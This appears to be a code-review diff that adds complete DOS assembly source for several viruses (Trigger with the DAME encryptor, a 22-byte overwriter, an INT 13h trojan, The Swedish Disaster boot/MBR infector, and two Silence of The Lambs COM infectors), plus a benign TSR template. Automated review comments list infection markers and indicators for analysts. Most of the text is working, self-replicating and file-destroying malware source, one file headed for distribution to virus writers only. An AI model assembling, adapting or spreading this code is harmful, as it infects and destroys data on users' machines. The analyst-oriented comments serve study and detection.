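Review bot: The `org $-1` / `org $-2` overlays are undocumented: before `no_win_run` the sequence `mov al,0` / `org $-1` / `jnc $` / `org $-1` / `je no_win_run` assembles to `mov al,73h` followed by the `je`, i.e. AL receives the opcode byte of `jnc` (and 0EBh, the `jmp short` opcode, when the `cmp ax,1600h` test fails), which `mov cs:cryp_switch,al` later writes over the `jnc decrypt_sec` at `cryp_switch`. A comment per overlay stating the bytes it is meant to produce, e.g. `; overlay: B0 73 -> mov al,73h (jnc opcode), later stored at cryp_switch`, would let a reader check the encoding without re-assembling; the overlays at `hd_read` (`js` opcode into `cryp_or_decryp`) and `copy_2_mbr` appear to follow the same pattern and deserve the same treatment. The `; <- set AL in zero manual on 1st execute!` note on `sbb al,al` likewise describes a hand-patch rather than anything the source guarantees, so that prerequisite should be stated next to the `tasm /m` line in the header.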

@ -0,0 +1,500 @@
.model tiny
.code
.radix 16
org 0
viruslength = (heap - entry)
virussizeK = (endvirus - entry + 3ff) / 400
virussizepara = (virussizeK)*40
EXE_ID = 'PS'
entry:
call past
next:
db 0,"Trigger by Dark Angel of Phalcon/Skism",0Dh,0A
db "Utilising Dark Angel's Multiple Encryptor (DAME)",0Dh,0A
db 0Dh,0A,0
checkstub db 72,0FA,0E,1F,0BA,00,0B8,0B8,40,00,8E,0C0,26,81,3E,63
past: cld
pop bp
mov ax,0cf0
mov bx,'DA'
int 21
cmp bx,'GH'
jnz no_trigger
trigger:
push ds
push es
push cs
pop ds
xor ax,ax
checkagain:
lea si,[bp+checkstub-next]
mov es,ax
xor di,di
mov cx,8
rep cmpsw
jz trigger_it
inc ax
cmp ax,0a000
jb checkagain
jmp exit_trigger
trigger_it:
mov [bp+patch-next],ax
mov ds,ax
mov byte ptr ds:73,0cbh
push bp
mov bp,-80
jmp short $+2
db 09a ; call far ptr
dw 1
patch dw ?
pop bp
mov byte ptr ds:73,1f
exit_trigger:
pop es
pop ds
jmp short restore
no_trigger:
mov ax,4b90
int 21
cmp ax,bx
jz restore
push ds
push es
mov ax,ds
dec ax
mov ds,ax
sub word ptr ds:3,virussizepara
sub word ptr ds:12,virussizepara
mov es,ds:12
push cs
pop ds
xor di,di
lea si,[bp+offset entry-offset next]
mov cx,(viruslength + 1)/2
rep movsw
xor ax,ax
mov ds,ax
sub word ptr ds:413,virussizeK
mov di,offset oldint21
mov si,21*4
movsw
movsw
cli
pushf
pushf
pop ax
or ah,1
push ax
mov ds:1*4+2,es
mov word ptr ds:1*4,offset int1_1
popf
mov ah,30
pushf
call dword ptr ds:21*4
popf
lds si,dword ptr es:oldint21
mov di,si
lodsw
mov word ptr es:int21patch1,ax
lodsw
mov word ptr es:int21patch2,ax
lodsb
mov byte ptr es:int21patch3,al
push ds ; es:di->int 21 handler
push es
pop ds ; ds->high segment
pop es
mov al,0ea
stosb
mov ax,offset int21
stosw
mov ax,ds
stosw
sti
pop es
pop ds
restore:
cmp sp,-2
jnz restoreEXE
restoreCOM:
lea si,[bp+readbuffer-next]
mov di,100
push di
movsw
movsw
ret
restoreEXE:
mov ax,ds
add ax,10
add cs:[bp+readbuffer+16-next], ax
add ax,cs:[bp+readbuffer+0e-next]
mov ss,ax
mov sp,cs:[bp+readbuffer+10-next]
jmp dword ptr cs:[bp+readbuffer+14-next]
readbuffer dw 20cdh
dw 0bh dup (?)
int1_1:
push bp
mov bp,sp
push ax
mov ax, [bp+4] ; get segment
cmp ax, cs:oldint21+2
jae exitint1
mov cs:oldint21+2,ax
mov ax, [bp+2]
mov cs:oldint21,ax
exitint1:
pop ax
pop bp
iret
int1_2:
push bp
mov bp,sp
push ax
mov ax,cs
cmp ax,[bp+4]
jz exitint1
mov ax,[bp+4]
cmp ax,cs:oldint21+2
jnz int1_2_restore
mov ax,[bp+2]
cmp ax,cs:oldint21
jb int1_2_restore
sub ax,5
cmp ax,cs:oldint21
jbe exitint1
int1_2_restore:
push es
push di
cld
les di,dword ptr cs:oldint21
mov al,0ea
stosb
mov ax,offset int21
stosw
mov ax,cs
stosw
pop di
pop es
and [bp+6],0feff
jmp exitint1
install:
mov bx,ax
iret
int21:
cmp ax,4b90
jz install
push ds
push di
lds di,dword ptr cs:oldint21
mov word ptr ds:[di],1234
int21patch1 = $ - 2
mov word ptr ds:[di+2],1234
int21patch2 = $ - 2
mov byte ptr ds:[di+4],12
int21patch3 = $ - 1
pop di
pop ds
cld
cmp ax,4b00
jz infect
exitint21:
push ds
push ax
xor ax,ax
mov ds,ax
cli
mov word ptr ds:1*4,offset int1_2
mov ds:1*4+2,cs
sti
pushf
pop ax
or ah,1
push ax
popf
pop ax
pop ds
db 0ea
oldint21 dw 0, 0
callint21:
pushf
call dword ptr cs:oldint21
ret
already_infected:
pop dx
pop cx
mov ax,5701
call callint21
mov ah,3e
call callint21
exitnoclose:
mov ax,4301
pop dx
pop ds
pop cx
call callint21
exitinfect:
pop es
pop ds
pop di
pop si
pop bp
pop bx
pop dx
pop cx
pop ax
jmp exitint21
infect:
push ax
push cx
push dx
push bx
push bp
push si
push di
push ds
push es
mov ax,4300
call callint21
push cx
push ds
push dx
mov ax,4301
xor cx,cx
call callint21
mov ax,3d02
call callint21
jc exitnoclose
xchg ax,bx
mov ax,5700
int 21
push cx
push dx
mov ah,3f
mov cx,18
push cs
pop ds
push cs
pop es
mov dx,offset readbuffer
mov si,dx
call callint21
jc already_infected
mov di,offset writebuffer
mov cx,18/2
push si
push di
rep movsw
pop di
pop si
mov ax,4202
xor cx,cx
cwd
int 21
cmp word ptr [di],'ZM'
jnz infectCOM
infectEXE:
cmp readbuffer+10,EXE_ID
go_already_infected:
jz already_infected
mov ds:writebuffer+4,ax
mov ds:writebuffer+2,dx
mov cx,10
div cx
sub ax,ds:writebuffer+8
mov ds:writebuffer+14,dx
mov ds:writebuffer+16,ax
xchg cx,dx
mov ds:writebuffer+0e,ax
mov ds:writebuffer+10,EXE_ID
mov al,10b
jmp finishinfect
infectCOM: ; si = readbuffer, di = writebuffer
push ax
mov cx,4
xor dx,dx
check_infection_loop:
lodsb
add dl,al
loop check_infection_loop
pop ax
or dl,dl
jz go_already_infected
mov dx,18
cmp ax,dx
jnb no_fixup_com
mov ax,4200
xor cx,cx
int 21
no_fixup_com:
mov cx,ax
inc ch ; add cx,100
sub ax,3
push ax
mov al,0e9
stosb
pop ax
stosw
add al,ah
add al,0e9
neg al
stosb
mov al,11b
finishinfect:
cbw
; ax = bitmask
; bx = start decrypt in carrier file
; cx = encrypt length
; dx = start encrypt in virus
; si = buffer to put decryption routine
; di = buffer to put encryption routine
push bx
xchg cx,bx
xor si,si
mov di,offset copyvirus
mov cx,(heap-entry+1)/2
rep movsw
push ax
call rnd_init_seed
pop ax
mov dx,offset copyvirus
mov cx,viruslength
mov si,offset _decryptbuffer
mov di,offset _encryptbuffer
call dame
push cx
cmp ds:writebuffer,'ZM'
jnz no_fix_header
mov dx,ds:writebuffer+2
mov ax,ds:writebuffer+4
add cx,viruslength
add ax,cx
adc dx,0
mov cx,200
div cx
or dx,dx
jz nohiccup
inc ax
nohiccup:
mov ds:writebuffer+4,ax
mov ds:writebuffer+2,dx
no_fix_header:
call di
pop cx
pop bx
mov ah,40
mov dx,offset _decryptbuffer
call callint21
mov ah,40
mov cx,viruslength
mov dx,offset copyvirus
call callint21
mov ax,4200
xor cx,cx
cwd
int 21
mov ah,40
mov cx,18
mov dx,offset writebuffer
call callint21
jmp already_infected
vars = 0
include dame.asm
heap:
vars = 1
include dame.asm
writebuffer dw 0c dup (?)
_encryptbuffer: db 80 dup (?)
_decryptbuffer: db 180 dup (?)
copyvirus db viruslength dup (?)
db 20 dup (?)
endvirus:
end entry
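Review bot: The listing is not self-contained: `include dame.asm` at the `vars = 0` and `vars = 1` lines pulls the encryptor in twice and that file is not part of this section, so the header comment should name the dependency and what each `vars` setting selects. The indicators an analyst needs are spread through the body and deserve a header summary: the installation check is INT 21h with AX=4B90h and BX='DA', answered by the resident copy with BX='GH' (`past`/`install`); EXE carriers are marked by `EXE_ID = 'PS'` in the header word at offset 10h; a COM carrier is treated as infected when its first four bytes sum to zero modulo 256 (`check_infection_loop`), which `infectCOM` arranges by emitting a fourth byte equal to the negated sum. The `trigger` path scans every segment below 0A000h for the 16-byte `checkstub` pattern and patches byte 73h of the matching segment; what that stub belongs to cannot be determined from this file and should be stated in a comment if known.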

@ -0,0 +1,17 @@
;22 Byte Trivial Virus
;Use WASM to assemble
org 100h
db '*.*',0
mov ah,4eh
Again
mov dx,si
int 21h
mov ah,3ch
mov dx,9eh
int 21h
xchg bx,ax
mov ah,40h
jmps Again
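Review bot: The header does not state the effect of the code, which is destructive: each name obtained from the findfirst call is passed to INT 21h function 3Ch (create/truncate) with DX=9Eh, the filename field of the default DTA, so the matched file is truncated before anything is written into it. The pattern address also comes from `mov dx,si` with no prior load of SI, which presumably relies on SI holding 0100h at COM entry — an assumption worth stating. A comment such as `; overwriter: 3Ch truncates the matched file, 40h writes the virus body over it` would make the sample's impact clear to a reader.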

@ -0,0 +1,69 @@
;*****************************************************************************
; The High Evolutionary's INT 13 Trojan
;*****************************************************************************
;
; Development Notes:
; (Dec.1O.9O)
;
; Well, I was screwing around with TSR's the other day and I got the idea,
; "Hmm. I wonder what would happen if you negated INT 13..." This trojan/TSR
; program answers my query.
;
; It's really a big mess. You can't access any file on the directory, you can't
; DIR anything, can't TYPE anything, I think the only thing you can do is
; DEL which is handled by INT 21.
;
; Well, in any event, put this routine in any nifty source code you see and
; then compile it... It will confuse the fuck out of any 100% "Lame" user.
;
; Have fun...
;
; -= The High Evolutionary =-
;
;*****************************************************************************
; Copyright (C) 199O by The RABID Nat'nl Development Corp.
;*****************************************************************************
code segment
assume cs:code,ds:code
org 100h
start: jmp init_vectors
mesg db 'INT 13 Trojan by The High Evolutionary'
crud db '(C) 199O by RABID Nat''nl Development Corp.'
crap dd ?
program proc far
assume cs:code,ds:nothing
mov ax,4c00h ; Terminate Program with exit code 00
int 21h ; Call DOS
program endp
;
; The TSR initialization shit happens here...
;
init_vectors proc near
assume cs:code,ds:code
mov ah,35h ; ask for int vector
mov al,13h ; intercept INT 13
int 21h ; Call DOS
mov word ptr crap,bx
mov word ptr crap[2],es
mov ah,25h ; set int value
mov al,13h ; set for INT 13
mov dx,offset program ; Tell the TSR what to do when accessed
int 21h ; Call DOS
mov dx,offset init_vectors ; Load in this segment into DX
int 27h ; Make the sucker in DX TSR...
init_vectors endp
code ends
end start
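Review bot: `crap` (declared at L15807, filled at L15821-L15822) receives the original INT 13h vector from function 35h, but nothing in the resident part reads it, so the hook is a one-way replacement rather than a chain and the header's "negated" should be spelled out as such. The entire replacement handler `program` is `mov ax,4c00h / int 21h`, i.e. a DOS terminate issued from inside an INT 13h invocation, which appears to end whatever process triggered the disk request while still in interrupt context — this is what produces the "can't DIR, can't TYPE" behavior described in the notes and should be stated next to the handler. A comment on `program` such as `; INT 13h replacement: every disk request ends the calling program via DOS 4Ch; original vector is never chained` would document the intent.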

@ -0,0 +1,260 @@
; Senast „ndrad 891213.
;
; L„gger gamla bootsectorn p† sida 1, sp†r 0, sector 3.
; sida 0, sp†r 0, sector 7 p† HD.
Code Segment
Assume cs:Code
Org 0000h
Main Proc Far
db 0EAh,05h,00h,0C0h,07h
jmp Near Ptr Init ; Hoppa f”rbi variabler och nya int13h
; Variabler
Old13h dd 0 ; Gamla vectorn till diskfunktionerna.
TmpVec dd 0 ; Tempor„r vec. vid „ndring av int 13.
BootPek dw 0003h,0100h
; Slut p† variabler
Int13h Proc Near
push ds
push ax
push bx
cmp dl,00h ; Drive A
jne Exit
cmp ah,02h
jb Exit
cmp ah,04h
ja Exit ; Kolla s† att func. 2-4
sub ax,ax
mov ds,ax
mov bx,043Fh ; Motor status byte.
test Byte Ptr [bx],01h ; Testa om motorn i A: „r p†..
jnz Exit ; Nej,hoppa till gamla int 13h
call Smitta
Exit: pop bx
pop ax
pop ds
jmp [Old13h]
Smitta Proc Near
push cx
push dx
push si
push di
push es
push cs
pop es
push cs
pop ds
mov si,0004h ; Max antal f”rs”k.
Retry: mov ax,0201h ; L„s en sector
mov bx,0200h ; L„s hit.
mov cx,0001h ; Sp†r 0 Sector 1
sub dx,dx ; Sida 0 Drive 0
pushf
call [Old13h] ; L„s in booten.
jnc OK
dec si
jz Slut ; Hoppa ur om fel.
jmp Retry ; F”rs”k max 4 g†nger.
OK: mov si,0200h
sub di,di
cld
lodsw
cmp ax,[di]
jne L2
lodsw
cmp ax,[di+2]
jne L2
jmp Slut
L2: mov ax,0301h ; Skriv en sector.
mov bx,0200h
mov cx,0003h ; Sp†r 0 Sector 3
mov dx,0100h ; Sida 1 Drive 0
pushf
call [Old13h] ; Flytta boot sectorn.
mov ax,0301h
sub bx,bx
mov cx,0001h
sub dx,dx
pushf
call [Old13h] ; Skriv ner viruset till booten.
Slut: pop es
pop di
pop si
pop dx
pop cx
ret
Smitta Endp
Int13h Endp
Init: sub ax,ax
mov ds,ax ; Nollar ds f”r att „ndra vect.
cli
mov ss,ax
mov sp,7C00h
sti ; S„tter upp en ny stack.
push cs
pop es
mov di,Offset Old13h
mov si,004Ch
mov cx,0004h
cld
rep movsb ; Flytta int 13h vectorn.
mov bx,0413h
mov ax,[bx] ; Minnesstorleken till ax.
dec ax
dec ax
mov [bx],ax ; Reservera plats f”r viruset.
mov cl,06h
shl ax,cl
mov es,ax ; Omvandla till segment addres.
mov Word Ptr TmpVec,Offset Int13h
mov Word Ptr TmpVec+2,es
push es
sub ax,ax
mov es,ax
push cs
pop ds
mov si,Offset TmpVec
mov di,004Ch
mov cx,0004h
rep movsb
pop es
sub si,si
mov di,si
mov cx,0200h ; Hela viruset + lite till.
rep movsb
mov ax,Offset Here
push es
push ax
ret ; Hoppa till viruset.
Here: sub ax,ax
int 13h ; <20>terst„ll driven
sub ax,ax
mov es,ax
mov ax,0201h ; L„s en sector funk.
mov bx,7C00h ; Hit laddas booten normalt.
mov cx,BootPek
mov dx,BootPek+2
int 13h
push cs
pop es
mov ax,0201h
mov bx,0200h
mov cx,0001h
mov dx,0080h
int 13h ; L„s in partions tabellen.
jc Over
push cs
pop ds
mov si,0200h
sub di,di
lodsw
cmp ax,[di] ; Kolla om den „r smittad.
jne HdInf
lodsw
cmp ax,[di+2]
jne HdInf
Over: mov BootPek,0003h
mov BootPek+2,0100h
sub bx,bx
push bx
mov bx,7C00h
push bx
ret ; K”r den gamla booten.
HdInf: mov BootPek,0007h
mov BootPek+2,0080h
mov ax,0301h
mov bx,0200h
mov cx,0007h
mov dx,0080h
int 13h ; Flytta orgin. part.tabellen.
jc Over
push cs
pop ds
push cs
pop es
mov si,03BEh
mov di,01BEh
mov cx,0042h
cld
rep movsb ; Kopiera part. data till viruset.
mov ax,0301h
sub bx,bx
mov cx,0001h
mov dx,0080h
int 13h ; Skriv viruset till part. tabellen.
sub ax,ax
mov es,ax ; Kolla om msg:et ska skrivas ut.
test Byte Ptr es:[046Ch],07h
jnz HdInf1
mov si,Offset Txt ; Detta utf”rs bara om man bootar fr†n
cld ; diskett.
Foo1: lodsb
cmp al,00h
je HdInf1
mov ah,0Eh
sub bx,bx
int 10h
jmp Foo1
HdInf1: jmp Over
Slutet Label Byte ; Anv„nds f”r att veta var slutet „r.
Txt db 07h,0Ah,0Dh,'The Swedish Disaster I',0Ah,0Dh,00h
Main Endp
Code Ends
End
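Review bot: The comments are in Swedish and the sample's indicators are not collected anywhere; an English header block would help an analyst. The displaced original boot sector is written to head 1, track 0, sector 3 on floppy and head 0, track 0, sector 7 on the hard disk (the `BootPek` values at L15988-L15989 and L15995-L15996); the already-infected test compares the first four bytes of the sector just read with the virus's own first four bytes (`db 0EAh,05h,00h,0C0h,07h`, a far jump to 07C0h:0005h); the INT 13h hook acts only on drive 0, functions 2-4, and only when bit 0 of the BIOS motor-status byte at 0:043Fh is clear. The text 'The Swedish Disaster I' is printed only on the hard-disk infection path and only when the low three bits of the BIOS tick count at 0:046Ch are zero, so absence of the message is not evidence of a clean system.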


@ -0,0 +1,166 @@
; Silence of The Lambs v1.0
; (c) The Chronomancer of Demoralized Youth 1992
;
; First version : Thursday 27th of Febuary - 01:50 CET.
;
org 100h
jmp short dummy1
db 'DY'
dummy1:
mov cx,(100h-80h)/2 ;save command line on stack
mov si,80h
save_parm:
push [si]
inc si
inc si
loop save_parm
mov ah,4Eh
xor cx,cx
mov dx,offset file
int 21h
jc nomore
again:
cmp byte [9Eh],0FAh
jae more
call infect
more:
mov ah,4Fh
int 21h
jnc again
nomore:
mov cx,(100h-80h)/2
mov si,0FEh
rest_parm:
pop [si]
dec si
dec si
loop rest_parm
mov bx,0000h
eof equ $-2
jmp bx
file db '*.COM',0
infect:
mov bx,cs
mov si,cs
dec si
mov ds,si
cmp byte[0],'Z'
je ok_mark
jmp back2
ok_mark:
sub word [0003h],pgfsize
jnc ok_mark2
jmp back
ok_mark2:
mov ax,[0012h]
sub ax,pgfsize
push ax
mov ds,bx
mov ax,4301h
xor cx,cx
mov dx,80h+1Eh
int 21h
mov ax,3D02h
int 21h
xchg bx,ax
pop ds
push ds
mov cx,total
xor dx,dx
mov ah,3Fh
int 21h
cmp byte [0],'M' ;exe ?
je close
cmp byte [0],'Z' ;exe ?
je close
cmp word [2],'YD' ;allready infected?
je close
xor cx,cx
xor dx,dx
push cx
push dx
mov ax,4202h
int 21h
add ax,total+100h
mov cs:word [00FEh],ax
mov ah,40h
mov cx,total
xor dx,dx
int 21h
push cs
pop ds
mov ah,40h
mov cx,applen
mov dx,offset append
int 21h
mov ax,4200h
pop dx
pop cx
int 21h
push [eof]
mov ax,word [00FEh]
mov [eof],ax
mov ah,40h
mov dx,100h
mov cx,total
int 21h
pop [eof]
close:
mov ah,3Eh
int 21h
back:
pop ds ;(mov ds,si)
add word [0003h],pgfsize
back2:
push cs
pop ds
ret
append:
call $+3
pop si
sub si,3+total
mov di,100h
mov cx,total
rep movsb
mov ax,100h
push ax
ret
applen equ $-offset append
total equ $-100h ;size
pgfsize equ ($-100h)/16+2 ;paragraphs needed
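Review bot: The header lists no indicators, and the ones visible here should be documented: a carrier is marked by the word 'DY' at offset 2 (written by the `db 'DY'` after the entry jump, tested at `cmp word [2],'YD'`), EXE files are rejected solely by a first byte of 'M' or 'Z', and the original program is restored at run time by the `append` stub, which copies `total` bytes from the end of the file back to 100h and returns there. The selection test `cmp byte [9Eh],0FAh` reads the first character of the filename field of the default DTA, which is presumably not what the name `more`/`infect` split suggests; a comment stating the intended criterion would make the listing readable.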


@ -0,0 +1,322 @@
; Silence of The Lambs v2.0
; (c) -=<: DRE/\MER :>=- of Demoralized Youth 1992
;
; THIS FILE IS FOR EDUCATION PURPOSES ONLY!
; PERMISSION IS GRANTED TO SPREAD THE SOURCE
; TO VIRUS WRITERS *ONLY*. PLEASE DO NOT MAKE
; ANY MODIFYCATIONS, UNLESS YOU ALSO INCLUDE
; THE ORIGINAL SOURCE.
;
; Assemble With A86
;
org 100h
jmp short dummy1
db 'DY'
dummy1:
mov cx,length
mov si,offset enc_start
mov ah,0
enc_key equ $-1
dummy2:
sub byte [si],ah
inc si
add ah,0
enc_add equ $-1
loop dummy2
enc_start:
mov ah,2Dh
mov ch,0FFh
mov dx,cx
int 21h
cmp al,0FFh
jne nomore
mov ax,cs
dec ax
mov ds,ax
cmp byte [0],'Z'
jne nomore
mov ax,word [3]
sub ax,pgfsize
jc nomore
sub word [3],pgfsize
sub word [12h],pgfsize
mov es,word [12h]
mov si,110h
mov di,100h
mov cx,total
cld
rep movsb
xor ax,ax
mov ds,ax
mov si,84h
mov di,old21
movsw
movsw
cli
mov word [84h+2],es
mov word [84h],offset ni21
sti
nomore:
push cs
push cs
pop es
pop ds
mov bx,0000h ;return control to the
eof equ $-2 ;end user
jmp bx
xclose: jmp close
infect:
push cs
pop ds
push cs
pop es
db 0E4h,40h
mov byte [enc_key],al
mov ax,4300h ;use CHMOD to get file attr
xor dx,dx
int 21h
mov [0F0h],cx ;store attr in PSP
mov ax,4301h ;clear file attr with CHMOD
xor cx,cx
int 21h
mov ax,3D02h ;open file for read / write
int 21h
xchg bx,ax
lahf
push ax
mov ax,5700h ;get file date & time
int 21h
mov [0F2h],cx
mov [0F4h],dx
pop ax
sahf
jc xclose
mov ah,3Fh ;read from file
mov cx,total
mov dx,old
int 21h
cmp byte [old+0],'M' ;exe MZ ?
je xclose
cmp byte [old+0],'Z' ;exe ZM ?
je xclose
cmp word [old+2],'YD' ;allready infected?
je xclose
mov ax,4202h ;lseek to EOF
xor cx,cx
xor dx,dx
int 21h
cmp ah,0FAh
jae xclose
cmp ah,4
jb xclose
add ax,total+100h
mov word [00F6h],ax
mov ah,40h ;write to EOF
mov cx,total
mov dx,old
push cx
mov al,byte [enc_key]
mov si,dx
enc_app:
xor byte [si],al
inc si
loop enc_app
pop cx
int 21h
mov ah,40h ;write to EOF
mov cx,applen
mov dx,offset append
int 21h
mov ax,4200h ;lseek to beginning of file
xor cx,cx
xor dx,dx
int 21h
push [eof]
mov ax,word [00F6h]
mov [eof],ax
mov ah,byte [enc_key]
db 0E4h,40h
mov byte [enc_add],al
mov dl,al
mov si,100h
mov di,old
cld
mov cx,offset enc_start-100h
rep movsb
mov cx,length
enc:
lodsb
add al,ah
stosb
add ah,dl
loop enc
mov ah,40h ;write viral code
mov dx,old
mov cx,total
int 21h
pop [eof]
close:
mov ax,5701h
mov cx,[00F2h]
mov dx,[00F4h]
int 21h
mov ah,3Eh ;close file
int 21h
mov ax,4301h
mov cx,[00F0h]
xor dx,dx
int 21h
ret
append:
call $+3 ;replace org bytes
pop si
sub si,3+total
mov di,100h
mov cx,total
mov ah,byte [enc_key]
append_enc:
lodsb
xor al,ah
stosb
loop append_enc
mov ax,100h ;return IP to 100h when done
push ax
sub ax,ax ;zero regs
xor bx,bx
and cx,cx
sub dx,dx
xor si,si
and di,di
sub bp,bp
ret
applen equ $-offset append
ni21:
pushf
cmp ah,2Dh
jne Not_Time
cmp ch,0FFh
jne Not_Time
cmp ch,dh
jne Not_time
mov Al,0
popf
iret
Not_Time:
cld
push ax
push bx
push cx
push dx
push si
push di
push bp
push es
push ds
; cmp ah,41h
; jne Not_Parse
; mov ah,3Ch
; cli
; add sp,18
; sti
; popf
; jmp old21-1
Not_Parse:
cmp ax,4B00h
jne Not_Exec
mov si,dx
push cs
pop es
xor di,di
mov cx,128
rep movsb
mov ax,3524h
int 21h
push es
push bx
push cs
pop ds
mov ax,2524h
mov dx,offset ni24
int 21h
call infect
pop dx
pop ds
mov ax,2524h
int 21h
Not_Exec:
pop ds
pop es
pop bp
pop di
pop si
pop dx
pop cx
pop bx
pop ax
popf
jmp far 0000:0000
old21 equ $-4
ni24: mov al,0
iret
db 'The Silence Of The Lambs!$'
total equ $-100h ;size
pgfsize equ (($*2)/16)+2
length equ $-offset enc_start
old equ $
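Review bot: The residency probe and the infection markers are the sample's most useful indicators and the header does not list them. `ni21` answers INT 21h AH=2Dh with CH=0FFh (and DH=CH) by returning AL=0, where DOS itself would reject the invalid time with AL=0FFh — that is how the code after `enc_start` detects an installed copy; infected COM files carry 'DY' at offset 2; infection happens on EXEC (AX=4B00h) with INT 24h temporarily pointed at `ni24` so critical errors on write-protected media are silenced. The body from `enc_start` to `old` is stored under a running-key byte transform (`enc_key`, `enc_add`), so the on-disk bytes differ per infection and the only stable prefix is the decryptor from 100h up to `enc_start`. A short English header covering these three points would serve an analyst better than the distribution notice.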


@ -0,0 +1,307 @@
; NOTE : This template is for .COM files only do not use for .EXE files!!
;
;
;
; Copyright 1986 by Dana Nowell - All rights reserved
;
; HISTORY:
; Version Date Name Description
; 1.0 11/10/86 dn first cut
; 1.01 11/21/86 dn Fixed memory allocation bug
; Added installation message
;
title TSR Template
NULL equ 00h
BELL equ 07h ; bell character
BACKSPACE equ 08h ; backspace character
TAB equ 09h ; tab character
LF equ 0ah ; line feed
F_FEED equ 0ch ; form feed
CR equ 0dh ; carriage return
EOF equ 1ah ; ctrl z ( end of file )
SPACE equ ' ' ; ascii space character
QUOTE equ '"'
SIGNATURE1 equ 6144h ; used for already
SIGNATURE2 equ 616eh ; resident check
DOS_INT equ 21h ; DOS function interrupt
DISP_CHAR equ 02h
GET_KEY equ 08h
DOS_SCR_MSG equ 09h
DOS_SET_INT equ 25h
DOS_RESIDENT equ 31h
DOS_GET_INT equ 35h
DOS_TERMINATE equ 4ch
DOS_STRING_TERM equ '$'
; Interrupt vectors used
HOOK_INT equ 1ch ; interrupt to be hooked ( timer tick now )
;------------------------------------------------------------------------------
;
; MACRO SECTION
;
;------------------------------------------------------------------------------
Version_msg macro
jmp short copyright_end
copyright_msg db CR, LF
db 'TSR Shell - Version 1.01', CR, LF
db 'Copyright 1986, Dana Nowell ', CR, LF, CR, LF
db 'May be distributed without license', CR, LF, '$'
copyright_end:
Msg copyright_msg
endm
Msg macro ptr
push dx
push ax
lea dx, ptr
mov ah, 09h
int 21h
pop ax
pop dx
endm
com segment para public 'code'
assume cs:com, ds:com, es:com
;------------------------------------------------------------------------------
;
; note: The PSP occurs at the beginning of the code segment
; for all programs. In COM files the code seg = data seg
;
;------------------------------------------------------------------------------
org 0
psp_start dw ? ; int 20h - possibly a block for unresolved
; externals during link ?
mem_size dw ? ; size of available memory in paragraphs
filler db ? ; reserved usually zero
dos_call db ? ; call
dd ? ; address of dos function handler
term_vector dd ? ; address of dos terminate routine
break_vector dd ? ; address of dos break routine
error_vector dd ? ; address of dos error routine
dos_reserved db 2 dup(?); reserved by dos
dos_handles db 20 dup(?) ; file handle array
environ_ptr dw ? ; seg of dos environment ( offset = 0 )
dos_work db 34 dup(?) ; dos work area
int_21h db ? ; int
db ? ; 21h
db ? ; retf ( return far )
reserved dw ? ; reserved by dos
fcb1_ext db 7 dup(?) ; fcb # 1 extension
fcb1 db 9 dup(?) ; fcb #1
fcb2_ext db 7 dup(?) ; fcb # 2 extension
fcb2 db 20 dup(?) ; fcb #2
;
; disk transfer area ( dta ) and parameter block occupy the same space
;
;
;dta db 128 dup(?) ; disk transfer area
param_len db ? ; length of parameter string ( excludes CR )
parameters db 127 dup(?) ; parameters
;------------------------------------------------------------------------------
;
; Note on standard fcb structure :
;
; The standard FCB is larger than the size reserved in the PSP if you
; intend to use to FCB data from the PSP move it to a different location.
;
;
; STANDARD STRUCTURE OF A FILE CONTROL BLOCK
;
;
; extension :
; offset length description
; -7 1 extension active flag ( 0ffh = active )
; -6 5 normally unused should be zeros
; -1 1 file attribute when extension is active
; 1 . . . . . . . 1 read-only
; 2 . . . . . . 1 . hidden
; 4 . . . . . 1 . . system
; 8 . . . . 1 . . . volume label
; 16 . . . 1 . . . . subdirectory
; 32 . . 1 . . . . . archive
; 64 . 1 . . . . . . unused
; 128 1 . . . . . . . unused
;
; fcb :
; offset length description
; 0 1 special drive number ( 1 byte )
; 0 = default
; 1 = a:
; 2 = b: etc
; 1 8 filename or device name
; 9 3 filename extension
; 12 2 current block number
; 14 2 record size
; 16 4 file size in bytes ( dos dir entry at open )
; 20 2 file date ( bit coded as in dir )
; 22 10 dos work area
; 32 1 current record number ( 0 - 127 )
; 33 4 random record number
;
;------------------------------------------------------------------------------
org 100h ; required for COM file ( skips PSP )
start:
jmp install ; install the demon
;-------------------------------------------------------------------
;
; resident data structures go here
;
;-------------------------------------------------------------------
old_int dd 0 ; original value of hooked interrupt
resident1 dw SIGNATURE1
resident2 dw SIGNATURE2
;-------------------------------------------------------------------
;
; new interrupt starts here
;
;-------------------------------------------------------------------
new_int:
pushf
sti ; must turn INT on if we're going to use them
;-------------------------------------------------------------------
;
; be well behaved and pass control to original int
;
;-------------------------------------------------------------------
popf
pushf
call dword ptr cs:old_int ; do old interrupt
iret ; bye bye
;------------------------------------------------------------------------------
;
; INSTALLATION DATA STRUCTURES AND CODE GO HERE
;
; WARNING WARNING WARNING - this area does not exist after installation
;
;------------------------------------------------------------------------------
last_resident_byte db 0 ; last resident byte
resident_flag dw 0 ; am I already resident ? ( 0 = NO )
install_msg db CR, LF, 'Installation Complete', CR, LF, '$'
already_installed_msg db CR, LF
db 'Already Installed - Installation Aborted'
db CR, LF, '$'
install proc near
Version_msg
mov al, HOOK_INT ; int to hook
mov ah, DOS_GET_INT ; get int(AL) vector ==> ES+BX
int DOS_INT ; do the int
lea si, old_int ; where to put old timer interrupt vector
mov [si], bx ; save the offset and segment
mov 2[si], es ; ( es also used in check resident )
call check_resident ; am I already resident ?
cmp resident_flag, 0
je not_resident
Msg already_installed_msg
mov ah, DOS_TERMINATE ; terminate & stay resident
mov al, 1 ; return value is 1 (already installed)
int DOS_INT ; bye-bye
not_resident:
mov dx, offset new_int ; offset of new timer interrupt
mov al, HOOK_INT ; timer tick
mov ah, DOS_SET_INT ; set int(AL) vector from DS+DX
int DOS_INT ; do the int
; program terminate and stay resident
Msg install_msg ; Display the installation message
mov dx, offset last_resident_byte
mov cl, 4 ; convert to paragraphs required to
shr dx, cl ; remain resident ( divide by 16 )
inc dx ; allow for any remainder of division
mov ah, DOS_RESIDENT ; terminate & stay resident
mov al, 0 ; return value is 0 (good return)
int DOS_INT ; bye-bye
install endp
;
; Check resident procedure
; requires es register to contain the segment address of
; the current location for the interrupt being hooked.
; use the DOS function 35h to obtain this information.
;
check_resident proc near
cmp es:resident1, SIGNATURE1
jne not_res
cmp es:resident2, SIGNATURE2
jne not_res
mov resident_flag, 1
not_res:
ret
check_resident endp
com ends
end start
